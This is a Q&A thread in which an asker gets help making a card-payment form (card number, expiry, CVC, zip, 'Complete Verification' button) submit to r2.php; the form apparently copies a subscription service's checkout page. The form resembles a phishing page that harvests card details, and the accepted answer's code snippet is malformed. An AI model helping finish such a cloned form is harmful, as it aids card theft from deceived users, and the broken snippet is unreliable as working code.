# button refreshes website even if there is an action

Tags: php, html

I'm working on a website but it seems that I'm having some problems with a `<button>` because it refreshes the website even if I have a  with an `action` that is a file called `r2.php`.
The `<button>` is supposed to take me to the file `r2.php` but apparently it's just refreshing the website here is the code of the page :

```
<form action="r2.php">
  <div class="row">
    <div class="col-xs-12">
      <div class="form-group">
        <label for="cardnumber" class="card-label">
                        <span id="trans-cardnumber">Card number</span>
                        <span class="card-icons">
                            <span id="provider-icons"><span class="icon-provider visa disabled" data-type="visa"></span><span class="icon-provider mastercard disabled" data-type="mastercard"></span><span class="icon-provider amex disabled" data-type="amex"></span><span class="icon-provider discover disabled" data-type="discover"></span></span>
                            <a id="secure-lock" class="icon-provider lock" data-tooltip="" data-lang="security_explained"></a>
                        </span>
                    </label>
        <span class="safe-field">
                        <input id="cardnumber" autocomplete="cc-number" type="tel" pattern="[0-9]*" placeholder="1111 2222 3333 4444" data-encrypted-name="number" class="form-control">
                    </span>
      </div>
    </div>
  </div>
  <div class="row">
    <div class="col-xs-12">
      <div class="form-group">
        <label id="trans-expiration_date" for="expiration_date">Expiry date</label>
        <div class="row">
          <div class="col-xs-6">
            <select id="expiry-month" autocomplete="cc-exp-month" data-encrypted-name="expiryMonth" class="form-control">
                                <option id="trans-label_month" value="" default="default" selected="selected">Month</option>
                                <option value="1">01</option>
                                <option value="2">02</option>
                                <option value="3">03</option>
                                <option value="4">04</option>
                                <option value="5">05</option>
                                <option value="6">06</option>
                                <option value="7">07</option>
                                <option value="8">08</option>
                                <option value="9">09</option>
                                <option value="10">10</option>
                                <option value="11">11</option>
                                <option value="12">12</option>
                            </select>
          </div>
          <div class="col-xs-6">
            <select id="expiry-year" autocomplete="cc-exp-year" data-encrypted-name="expiryYear" class="form-control">
                                <option id="trans-label_year" value="" default="" selected="selected">Year</option>
                            <option value="2017">17</option><option value="2018">18</option><option value="2019">19</option><option value="2020">20</option><option value="2021">21</option><option value="2022">22</option><option value="2023">23</option><option value="2024">24</option><option value="2025">25</option><option value="2026">26</option><option value="2027">27</option><option value="2028">28</option><option value="2029">29</option><option value="2030">30</option><option value="2031">31</option><option value="2032">32</option><option value="2033">33</option><option value="2034">34</option><option value="2035">35</option><option value="2036">36</option><option value="2037">37</option><option value="2038">38</option><option value="2039">39</option><option value="2040">40</option><option value="2041">41</option><option value="2042">42</option><option value="2043">43</option><option value="2044">44</option><option value="2045">45</option><option value="2046">46</option></select>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="row">
    <div class="col-xs-6">
      <div class="form-group">
        <label id="trans-security_code" for="security-code" class="contain-tooltip" data-tooltip="" data-lang="cvc_info">Security code</label>
        <span class="safe-field">
                        <input id="security-code" autocomplete="off" type="tel" pattern="[0-9]*" placeholder="" data-encrypted-name="cvc" class="form-control">
                    </span>
      </div>
    </div>
    <div class="col-xs-6">
      <div class="form-group">
        <label id="trans-label_postal_code" for="zip-code">Zip code</label>
        <input id="zip-code" name="zip-code" autocomplete="off" type="text" class="form-control">
      </div>
    </div>
  </div>

  <aside class="aside-legal">

    <p>
      You hereby authorise us to charge you automatically every month until you cancel your subscription. Full terms are available <a href="/us/legal/end-user-agreement/" target="_blank">here.</a>
    </p>
  </aside>

  <button type="submit">Complete Verification</button>


</form>
```

Comment: It would be nice if you just include the problematic `<button>` part instead of the whole codes

Comment: @ahmedreda bounouala i have copied you code its working fine. when i click on `Complete Verification` button it takes me to `r2.php`.

Comment: I don't really understand html and php so I don't know what could be the problem :/

Comment: It doesn't work for me I don't know what it the problem

Comment: Checking on button, form submit and you are making a `GET` request which looks fine. In `r2.php` try `print_r($_GET)` you should able to see submitted form values

Comment: what should I do ? I didn't understand what u just said

Comment: In `r2.php`, put `echo '<pre>'; <?php print_r($_GET);  echo '</pre>';?>` at the top of code. After that fill the form and click on the button which will redirect to `r2.php` and you should see some data printed on top.

Comment: I tried it the website doesn't redirect to r2.php at all that's my problem

Answer (score 2, accepted):

I see your code and I think you might miss the method in `form` tag.

> Note: If you did not put method on `form` tag it takes `method='GET'`
>   automatically by default.

```
<form action="action="r2.php" method="POST">
 //Try this way might it help.
</form>
```

Comment: Nothing happened bro same problem

Comment: I have tried your code in my localhost your `Complete Verification` button is working fine. it submit the form

Comment: could css be the problem ? or could it cause such a problem

Comment: I think you might need an `ajax` for submit a form without reloading. is that correct?

Comment: well my problem is that the website doesn't redirect to r2.php at all

Comment: I am not sure about that `CSS` is creating a problem to submitting a form.

Comment: I have tried both 'GET` & 'POST` method with your code in simple plain `HTML` it's working fine.

Comment: Without knowing your all code I can not help sir, can you please try `<input type='submit'>`

Comment: It didn't work :/ could we talk on facebook or something so I could show you the whole code

Comment: sorry, i am not on it.  But You should try to use your code as plain `HTML` or do debugging.  Create and simple `HTML` page and put your Entire `form` in it and try it.

Comment: Thanks I fixed it <3

Comment: Please Share what was the problem. @ahmedredabounouala

Comment: You were very helpful stackoverflow is the best <3

Answer (score 0):

The problem was in the form I didn't put a post method like this :

```
 <form action="r2.php" method="POST">
```